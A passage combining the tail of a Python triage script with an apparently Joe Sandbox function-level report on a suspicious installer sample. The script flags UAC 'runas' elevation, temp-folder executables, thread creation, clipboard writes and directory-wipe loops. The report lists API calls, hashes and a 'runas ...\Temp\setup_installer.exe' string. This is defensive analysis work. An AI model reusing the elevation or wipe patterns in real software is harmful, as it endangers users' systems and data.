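    module: str
    args: tuple
    ref: int                  # call-site address from the "ref:" field
    subcall: Optional[int]    # callee address when the line is "Part of subcall function"


@dataclass(frozen=True)
class Finding:
    ref: int
    tag: str
    detail: str


def _hex(arg: str) -> Optional[int]:
    """Interpret an 8-digit hex argument; '?' and symbolic values give None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(m.group("args").split(",")) if m.group("args") else ()
        sub = m.group("subcall")
        calls.append(ApiCall(m.group("func"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def triage(calls: List[ApiCall]) -> List[Finding]:
    """Apply a few per-call and cross-call rules; ordering follows the listing."""
    findings = []
    for c in calls:
        for a in c.args:
            if a.lower().startswith("runas "):
                # "runas <path>" is the verb/path pair used to request UAC elevation
                findings.append(Finding(c.ref, "runas", a[6:]))
            elif TEMP_EXE.search(a):
                findings.append(Finding(c.ref, "temp_exe", a))
        if c.func in THREAD_APIS:
            # CreateThread's third parameter is lpStartAddress
            findings.append(Finding(c.ref, "thread", c.args[2] if len(c.args) > 2 else "?"))
        if c.func == "SetClipboardData" and c.args:
            fmt = _hex(c.args[0])
            findings.append(Finding(c.ref, "clipboard_write",
                                    CLIPBOARD_FORMATS.get(fmt, f"format {c.args[0]}")))
    # DeleteFileW fed by a "\*.*" enumeration is a directory-wipe loop
    deletes = [c for c in calls if c.func == "DeleteFileW"]
    wildcard = any(a.endswith(r"\*.*") for c in calls
                   if c.func in ("lstrcatW", "FindFirstFileW") for a in c.args)
    if deletes and wildcard:
        findings.append(Finding(deletes[0].ref, "dir_wipe",
                                r"DeleteFileW driven by a FindFirstFileW \*.* enumeration"))
    return findings


if __name__ == "__main__":
    for f in triage(parse_api_lines(SAMPLE_API_LINES)):
        print(f"{f.ref:08X}  {f.tag:<16}{f.detail}")
```

Run against a whole report export the same rules apply per function entry; splitting on the "APIs" heading and calling `triage` per entry keeps the `dir_wipe` rule from pairing a DeleteFileW in one function with a wildcard in another.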
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,00000000), ref: 00405C77
                                        • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CE8
                                        • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CF8
                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
                                        • FindClose.KERNEL32(00000000), ref: 00405DA7
                                        Strings
                                        • "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe", xrefs: 00405C4E
                                        • PWB, xrefs: 00405CA7
                                        • \*.*, xrefs: 00405CB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$PWB$\*.*
                                        • API String ID: 2035342205-2540774632
                                        • Opcode ID: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
                                        • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
                                        • Opcode Fuzzy Hash: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
                                        • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
                                        APIs
                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402261
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 542301482-47812868
                                        • Opcode ID: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                                        • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
                                        • Opcode Fuzzy Hash: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                                        • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
                                        APIs
                                        • FindFirstFileW.KERNEL32(74DF3420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 004068A5
                                        • FindClose.KERNEL32(00000000), ref: 004068B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                        • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
                                        • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                        • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                                        • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
                                        • Opcode Fuzzy Hash: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                                        • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F16
                                        • GetDlgItem.USER32(?,00000408), ref: 00404F23
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F86
                                        • SetWindowLongW.USER32(?,000000FC,00405518), ref: 00404FA0
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
                                        • DeleteObject.GDI32(00000110), ref: 00405000
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                          • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                        • ShowWindow.USER32(?,00000005), ref: 00405162
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405336
                                        • GlobalFree.KERNEL32(?), ref: 00405346
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
                                        • ShowWindow.USER32(?,00000000), ref: 004054EF
                                        • GetDlgItem.USER32(?,000003FE), ref: 004054FA
                                        • ShowWindow.USER32(00000000), ref: 00405501
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
                                        • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
                                        • Opcode Fuzzy Hash: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
                                        • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
                                        • ShowWindow.USER32(?), ref: 00404012
                                        • DestroyWindow.USER32 ref: 00404026
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404042
                                        • GetDlgItem.USER32(?,?), ref: 00404063
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
                                        • IsWindowEnabled.USER32(00000000), ref: 0040407E
                                        • GetDlgItem.USER32(?,00000001), ref: 0040412C
                                        • GetDlgItem.USER32(?,00000002), ref: 00404136
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
                                        • GetDlgItem.USER32(?,00000003), ref: 00404247
                                        • ShowWindow.USER32(00000000,?), ref: 00404268
                                        • EnableWindow.USER32(?,?), ref: 0040427A
                                        • EnableWindow.USER32(?,?), ref: 00404295
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
                                        • EnableMenuItem.USER32(00000000), ref: 004042B2
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
                                        • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
                                        • SetWindowTextW.USER32(?,00423748), ref: 0040431B
                                        • ShowWindow.USER32(?,0000000A), ref: 0040444F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                        • String ID: H7B
                                        • API String ID: 184305955-2300413410
                                        • Opcode ID: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
                                        • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
                                        • Opcode Fuzzy Hash: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
                                        • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404703
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
                                        • GetSysColor.USER32(?), ref: 00404731
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
                                        • lstrlenW.KERNEL32(?), ref: 00404752
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
                                        • GetDlgItem.USER32(?,0000040A), ref: 004047CD
                                        • SendMessageW.USER32(00000000), ref: 004047D4
                                        • GetDlgItem.USER32(?,000003E8), ref: 004047FF
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
                                        • SetCursor.USER32(00000000), ref: 00404853
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
                                        • SetCursor.USER32(00000000), ref: 0040486F
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
                                        Strings
                                        • N, xrefs: 004047ED
                                        • runas C:\Users\user\AppData\Local\Temp\setup_installer.exe, xrefs: 0040482E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: N$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 3103080414-3434175074
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
                                        • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004061CC
                                          • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                          • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                        • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 004061E9
                                        • wsprintfA.USER32 ref: 00406207
                                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
                                        • GlobalFree.KERNEL32(00000000), ref: 004062F0
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                                          • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00406036
                                          • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                        • API String ID: 2171350718-2295842750
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000400), ref: 004066BA
                                        • GetWindowsDirectoryW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
                                        • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
                                        • SHGetPathFromIDListW.SHELL32(00000000,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe), ref: 00406717
                                        • CoTaskMemFree.OLE32(00000000), ref: 00406722
                                        • lstrcatW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
                                        • lstrlenW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 717251189-994760500
                                        APIs
                                        • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                        • lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                        • lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                        • SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: ('B
                                        • API String ID: 2531174081-2332581011
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                        • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                        • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                        • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
                                        • "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe", xrefs: 004067EB
                                        • *?|<>/":, xrefs: 0040683D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-869326622
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404516
                                        • GetSysColor.USER32(00000000), ref: 00404554
                                        • SetTextColor.GDI32(?,00000000), ref: 00404560
                                        • SetBkMode.GDI32(?,?), ref: 0040456C
                                        • GetSysColor.USER32(?), ref: 0040457F
                                        • SetBkColor.GDI32(?,?), ref: 0040458F
                                        • DeleteObject.GDI32(?), ref: 004045A9
                                        • CreateBrushIndirect.GDI32(?), ref: 004045B3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        APIs
                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                          • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
                                        • GetTickCount.KERNEL32 ref: 00402FFF
                                        • wsprintfW.USER32 ref: 0040302D
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                          • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                          • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                                          • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                          • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00403051
